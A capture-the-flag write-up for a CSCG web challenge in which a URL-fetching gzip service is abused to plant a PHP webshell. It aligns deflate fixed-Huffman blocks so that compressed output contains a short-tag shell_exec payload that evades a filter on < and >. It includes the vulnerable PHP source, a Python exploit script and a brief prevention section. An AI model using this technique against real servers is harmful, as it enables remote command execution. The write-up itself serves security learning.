πŸ“ƒ Challenge Description

A cool service for you that should have existed in 1999

πŸ”Ž Research

We are given a zip file containing the sources to deploy our own server. A quick look into the files shows that the flag is stored in the flag.php file:

Untitled

Okay, let’s take a look on the website.

Untitled1

Here we can enter a url that will be fetched and gzipped to a file. This file is stored on the server, and we could download it if we want. Here is the source code for this part:

<?php
error_reporting(E_ALL);
session_start();
 

if (!isset($_SESSION['userid'])) {
	die("No userid set. Call index.php first to set the cookie");
  }

if (!isset($_POST["url"])) {
	die("No url set");
}
$url = $_POST["url"];

$ext = ".txt.gz";

if (isset($_POST["ext"])) {
	if (preg_match("/([.a-z0-9]{3,10})/", $_POST["ext"], $matches) == 1) {
		$ext = $matches[0];
	}
}

if (strpos($ext, "..") !== FALSE) {
	die("Hacking!");
}

if (!file_exists('uploads')) {
	mkdir('uploads', 0777, true);
}

$user_dir = 'uploads/' . $_SESSION['userid'] . "/";

if (!file_exists($user_dir)) {
	mkdir($user_dir, 0777, true);
}

if (substr( $url, 0, 7 ) !== "http://" && substr( $url, 0, 8 ) !== "https://") {
	die("Invalid url!");
}

$data_to_compress = file_get_contents($url);
$data_to_compress = "----------- CREATED WITH GZIP PACKER V0.1  -------------------\n" . $data_to_compress;

// We dont like XSS, filter the worst chars
$data_to_compress = str_replace("<", "&lt;", $data_to_compress);
$data_to_compress = str_replace(">", "&gt;", $data_to_compress);

$output_file = $user_dir  . 'outputfile' . $ext;

$gz = gzopen($output_file,'w9');
gzwrite($gz, $data_to_compress);
gzclose($gz);

echo "<a href='" . $output_file . "'>Download file</a>";

So as it turns out we can not bypass the extension or ulr filter to get a LFI, we have to somehow inject a webshell in the gzipped file on the server so we can execute commands when accessing it.

πŸ“ Vulnerability Description

The program only checks for script tags < and > in the uncompressed data. This prevents RCE when using a payload that is gzipped to a stored block. However, when crafting a payload that does not have < or > in it, meaning that it is gzipped to either a fixed or dynamic block, and this block contains < or > in its gzipped output, we can bypass this filter.

🧠 Exploit Development

For our webshell that will be injected in the gzipped file we will use an already engineered payload for a fixed huffman encoding from idontplaydarts:

Untitled2

NOTE that <?= is a shortcut for <?php echo. So with this payload we can execute any arbitrary php function with any arbitrary parameter. For our use cases the shell_exec function is exactly what we want so we can emulate a web shell through that. We specify this function in the GET parameter with the key '0', and the parameter for this function in the POST body with the key '1'.

As our payload is prepended with the string "----------- CREATED WITH GZIP PACKER V0.1 -------------------\n", we cannot simply use the payload above as it is. The problem is, the web shell payload is designed to work when deflating it at the beginning. The deflate algorithm describes the start of each block in a deflated stream as follows:

Untitled3

Untitled4

So the first 3 bits in a new block describe if the block is the last block and what blocktype is used. When gzipping our web shell payload, the start of the block would look like

0b01100_011 #web shell starts at 4rd LSB
0b01011110 # character '^'
0b00111100 # character '<'
0b00111111 # character '?'
# ...

With the 1 at the end marking this block as the last block and the 01 afterward indicating this block as a fixed block.

Though when gzipping the web shell with the prepended string, this alignment is destroyed. We can see that the web shell compression starts at the 5th bit:

0b1100_0101 #web ΒΌll starts at 5rd LSB
0b10111100 # character 'ΒΌ'
0b01111000 # character 'x'
0b01111110 # character '~'
# ...

Obviously the different aligment destroyed the web shell. To fix that, let’s take a look on how deflate compresses data using the fixed huffman encoding:

Untitled5

So literal values from 144 till 255 are represented as 9bit codes going from 0b110010000 till 0b111111111. Knowing this we can prepend our web shell payload 6 nine-bit literals, to align the start of the web shell payload to the original 4th bit. I chose \x90\x91\x92\x93\x94\x95\x93 as my 6 nine-bit literals, and we can see that the web shell payload is aligned to the 4th bit again:

0b01100_110 #web shell starts at 4rd LSB, same as original**
0b01011110 # character '^'
0b00111100 # character '<'
0b00111111 # character '?'
# ...

So our final payload looks like this:

Untitled6

When this payload is gzipped on the server, it is giving us the web shell:

Untitled7

πŸ” Exploit Program

import requests
import sys
import re
import gzip
import sys

if(len(sys.argv) < 4):
	print("Usage: python3 xtool.py <webapp-uri> <upload-uri> <ext>")
	sys.exit(0)

url = str(sys.argv[1])

#get user_id cookie
def get_user_id_cookie(s):
	s.get(url)

def parse_error(r):
	if(not r.ok):
		return "Not OK"
	if("Invalid" in r.text):
		return "Invalid"
	elif("userid" in r.text):
		return "userid"
	elif("Hacking" in r.text):
		return "Hacking"
	return ""

def compress_request(s, cookies, headers, file_uri, ext, data):
	r = s.post(url+"compress.php", data=data, cookies=cookies, headers=headers)

	error = parse_error(r)
	if(error):
		print(error)
		sys.exit(0)
	return r

def extract_download_link(r):
	link = re.findall("href='.*?'", r.text)
	if(link):
		return url + link[0].replace("'","").replace("href=","")

def decompress_file(s, link_to_file):
	r = s.get(link_to_file)
	d = gzip.decompress(r.content)
	return d.decode('utf-8')

cookies = {}
headers = {}

file_uri = str(sys.argv[2]).encode("utf-8")
ext = str(sys.argv[3])
print("webapp: {0}".format(str(url)))
print("file_uri: {0}".format(str(file_uri)))
print("ext: {0}".format(str(ext)))

data = {"url": file_uri, "ext": ext}

s = requests.Session()
get_user_id_cookie(s)
print("Set user_id cookie")
r = compress_request(s, cookies, headers, file_uri, ext, data)
print("Sent compress request...")
link = extract_download_link(r)
print("Decompressing file {0}".format(str(link)))
c = decompress_file(s, link)
print("Decrompressed output: \n{0}".format(str(c)))

πŸ’₯ Run Exploit

Untitled8

Untitled9

FLAG: CSCG{I_h0pe_y0u_f0und_th3_sh0rt_tags_(btw_idea_was_from_CVE2020_11060)}

πŸ›‘οΈ Possible Prevention

To prevent this exploit, one should also scan the compressed gzipped output and take actions if something like <? occurs in the output. This can be lead to false positives, but a <? sequence inside the compressed data is without a specially crafted input very unlikely.

πŸ—„οΈ Summary / Difficulties

Personally I enjoyed this challenge a lot! The context of a real CVE made this challenge also very interesting. I learned a lot about the zlib internals and had a lot of fun reversing the deflate algorithm. Generally said there would have been so much more approaches to solve this challenge, that this challenge is very valuable for CTF players.

πŸ—ƒοΈ Further References

RFC 1951 - DEFLATE Compressed Data Format Specification version 1.3

Playing with GZIP: RCE in GLPI (CVE-2020-11060)

Revisiting XSS payloads in PNG IDAT chunks

Deflate Format: differences between type blocks

Encoding Web Shells in PNG IDAT chunks